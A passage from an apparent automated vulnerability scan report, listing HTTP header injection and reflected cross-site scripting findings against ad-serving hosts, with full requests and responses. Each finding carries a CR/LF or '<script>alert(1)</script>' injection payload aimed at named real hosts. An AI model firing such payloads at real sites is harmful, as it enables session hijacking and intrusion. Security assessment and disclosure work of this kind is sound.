Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; ANRTT=50280^1^1304552288|60183^1^1304972402|60130^1^1304972569|50220^1^1304989381|53615^1^1305130724; TData=99999|^|53380|60490|52615|60491|50507|53656|55401|57094|51182|56419|56780|54057|56969|56835|56987|50220|54063|50221|56299|56673|56148|#|50280|60183|60130|53615; N=2:e9ebc43a6cfe5a77b4292e4a653ed900,e9dea91c9922c1119a56ba5e202fb739d456f%0d%0a2970b16bd28; ATTAC=a3ZzZWc9OTk5OTk6NTMzODA6NjA0OTA6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTExODI6NTY0MTk6NTY3ODA6NTQwNTc6NTY5Njk6NTY4MzU6NTY5ODc6NTAyMjA6NTQwNjM6NTAyMjE6NTYyOTk6NTY2NzM6NTYxNDg6NTAyODA6NjAxODM6NjAxMzA6NTM2MTU=; eadx=1

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:44 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Thu, 05 May 2011 01:12:44 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; path=/; expires=Sun, 29-Apr-12 00:57:44 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=60183^1^1304972402|60130^1^1304972569|50220^1^1304989381|53615^1^1305130724|50215^1^1305161864; path=/; expires=Thu, 12-May-11 00:57:44 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1304557064^1304558864|16768^1304557064^1304558864; path=/; expires=Thu, 05-May-11 01:27:44 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|53380|60490|50963|52615|60491|50507|53656|55401|57094|50961|51182|56419|56148|57362|56673|56969|56987|56780|50220|56835|56299|54057|50229|54063|57144|#|60183|60130|53615|50215; expires=Sun, 29-Apr-12 00:57:44 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:e9dea91c9922c1119a56ba5e202fb739d456f
2970b16bd28
,d3862dbef41427b3fc30afea7d68bc62; expires=Sun, 29-Apr-12 00:57:44 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTMzODA6NjA0OTA6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTExODI6NTY0MTk6NTYxNDg6NTczNjI6NTY2NzM6NTY5Njk6NTY5ODc6NTY3ODA6NTAyMjA6NTY4MzU6NTYyOTk6NTQwNTc6NTAyMjk6NTQwNjM6NTcxNDQ6NjAxODM6NjAxMzA6NTM2MTU6NTAyMTU=; expires=Sun, 29-Apr-12 00:57:44 GMT; path=/; domain=.at.atwola.com
Set-Cookie: eadx=x; path=/; expires=Fri, 06-May-11 00:57:44 GMT; domain=tacoda.at.atwola.com
ntCoent-Length: 287
Content-Type: application/x-javascript
Content-Length: 287

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16r4opq1tvlkml';
var ANSL='99999|^|53380|60490|50963|52615|60491|50507|53656|55401|57094|50961|51182|56419|56148|57362|56673|56969|56987|56780|50220|
...[SNIP]...

4.79. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload 1d221%0d%0ac6c2ad9c6a7 was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=MUS&si=1d221%0d%0ac6c2ad9c6a7&pi=L&xs=3&pu=http%253A//cdn.at.atwola.com/_media/uac/tcode3.html%253Fifu%253Dhttp%25253A//music.aol.com/radioguide/bb%2526cmmiss%253D-1%2526cmkw%253D&r=&df=1&v=5.5&cb=56823 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; ANRTT=50280^1^1304552288|60183^1^1304972402|60130^1^1304972569|50220^1^1304989381|53615^1^1305130724; TData=99999|^|53380|60490|52615|60491|50507|53656|55401|57094|51182|56419|56780|54057|56969|56835|56987|50220|54063|50221|56299|56673|56148|#|50280|60183|60130|53615; N=2:e9ebc43a6cfe5a77b4292e4a653ed900,e9dea91c9922c1119a56ba5e202fb739; ATTAC=a3ZzZWc9OTk5OTk6NTMzODA6NjA0OTA6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTExODI6NTY0MTk6NTY3ODA6NTQwNTc6NTY5Njk6NTY4MzU6NTY5ODc6NTAyMjA6NTQwNjM6NTAyMjE6NTYyOTk6NTY2NzM6NTYxNDg6NTAyODA6NjAxODM6NjAxMzA6NTM2MTU=; eadx=1

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:43 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Thu, 05 May 2011 01:12:43 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; path=/; expires=Sun, 29-Apr-12 00:57:43 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=60183^1^1304972402|60130^1^1304972569|50220^1^1304989381|53615^1^1305130724|50215^1^1305161863; path=/; expires=Thu, 12-May-11 00:57:43 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1304557063^1304558863|1d221
c6c2ad9c6a7
^1304557063^1304558863; path=/; expires=Thu, 05-May-11 01:27:43 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|53380|60490|50963|52615|60491|50507|53656|55401|57094|50961|51182|56419|56148|57362|56673|56969|56987|56780|50220|56835|56299|54057|50229|54063|57144|#|60183|60130|53615|50215; expires=Sun, 29-Apr-12 00:57:43 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:e9dea91c9922c1119a56ba5e202fb739,d3862dbef41427b3fc30afea7d68bc62; expires=Sun, 29-Apr-12 00:57:43 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTMzODA6NjA0OTA6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTExODI6NTY0MTk6NTYxNDg6NTczNjI6NTY2NzM6NTY5Njk6NTY5ODc6NTY3ODA6NTAyMjA6NTY4MzU6NTYyOTk6NTQwNTc6NTAyMjk6NTQwNjM6NTcxNDQ6NjAxODM6NjAxMzA6NTM2MTU6NTAyMTU=; expires=Sun, 29-Apr-12 00:57:43 GMT; path=/; domain=.at.atwola.com
Set-Cookie: eadx=x; path=/; expires=Fri, 06-May-11 00:57:43 GMT; domain=tacoda.at.atwola.com
Cteonnt-Length: 287
Content-Type: application/x-javascript
Content-Length: 287

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16r4opq1tvlkml';
var ANSL='99999|^|53380|60490|50963|52615|60491|50507|53656|55401|57094|50961|51182|56419|56148|57362|56673|56969|56987|56780|50220|
...[SNIP]...

5. Cross-site scripting (reflected)
There are 254 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences.

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


5.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 9221e<script>alert(1)</script>94174a81006 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=4809221e<script>alert(1)</script>94174a81006&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019; SERVERID=s12

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:58 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 4809221e<script>alert(1)</script>94174a81006-SM=adver_05-05-2011-00-59-58; expires=Sun, 08-May-2011 00:59:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 4809221e<script>alert(1)</script>94174a81006-VT=adver_05-05-2011-00-59-58_7451664491304557198; expires=Tue, 03-May-2016 00:59:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 4809221e<script>alert(1)</script>94174a81006-nUID=adver_7451664491304557198; expires=Thu, 05-May-2011 01:14:58 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='4809221e<script>alert(1)</script>94174a81006';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='7451664491304557198';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='
...[SNIP]...

5.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload d7f22<script>alert(1)</script>7b75f73abf2 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adverd7f22<script>alert(1)</script>7b75f73abf2&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019; SERVERID=s12

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:56 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 08-May-2011 00:59:56 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019ZZZZadverd7f22%3Cscript%3Ealert%281%29%3C%2Fscript%3E7b75f73abf2_05-05-2011-00-59-56_3893459661304557196; expires=Tue, 03-May-2016 00:59:56 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adverd7f22%3Cscript%3Ealert%281%29%3C%2Fscript%3E7b75f73abf2_3893459661304557196; expires=Thu, 05-May-2011 01:14:56 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=window.c3Vinter}else this.C3VTcallVar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adverd7f22<script>alert(1)</script>7b75f73abf2';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='389345966130455
...[SNIP]...

5.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7acb7<script>alert(1)</script>73974861fc3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=/7acb7<script>alert(1)</script>73974861fc3&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019; SERVERID=s12

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:27 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 08-May-2011 01:00:27 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019ZZZZadver_05-05-2011-01-00-27_14374677881304557227; expires=Tue, 03-May-2016 01:00:27 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_14374677881304557227; expires=Thu, 05-May-2011 01:15:27 GMT; path=/; domain=c3metrics.com
Content-Length: 6680
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
c3VJSnuid='14374677881304557227';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='/7acb7<script>alert(1)</script>73974861fc3';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

5.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the rv request parameter is copied into the HTML document as plain text between tags. The payload 93c9a<script>alert(1)</script>cc2d4b62d7a was submitted in the rv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=93c9a<script>alert(1)</script>cc2d4b62d7a&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019; SERVERID=s12

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:01 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 08-May-2011 01:00:01 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019ZZZZadver_05-05-2011-01-00-01_3147161271304557201; expires=Tue, 03-May-2016 01:00:01 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_3147161271304557201; expires=Thu, 05-May-2011 01:15:01 GMT; path=/; domain=c3metrics.com
Content-Length: 6698
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='3147161271304557201';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='93c9a<script>alert(1)</script>cc2d4b62d7a';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJSc
...[SNIP]...

5.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload 93096<script>alert(1)</script>716cb79c236 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=7293096<script>alert(1)</script>716cb79c236&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019; SERVERID=s12

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:00 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sat, 02-May-2843 01:00:00 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019ZZZZadver_05-05-2011-01-00-00_1648367301304557200; expires=Tue, 03-May-2016 01:00:00 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_1648367301304557200; expires=Thu, 05-May-2011 01:15:00 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='1648367301304557200';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='7293096<script>alert(1)</script>716cb79c236';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3V
...[SNIP]...

5.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload ebffd<script>alert(1)</script>c867e4ea0b4 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=ebffd<script>alert(1)</script>c867e4ea0b4&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019; SERVERID=s12

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:02 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
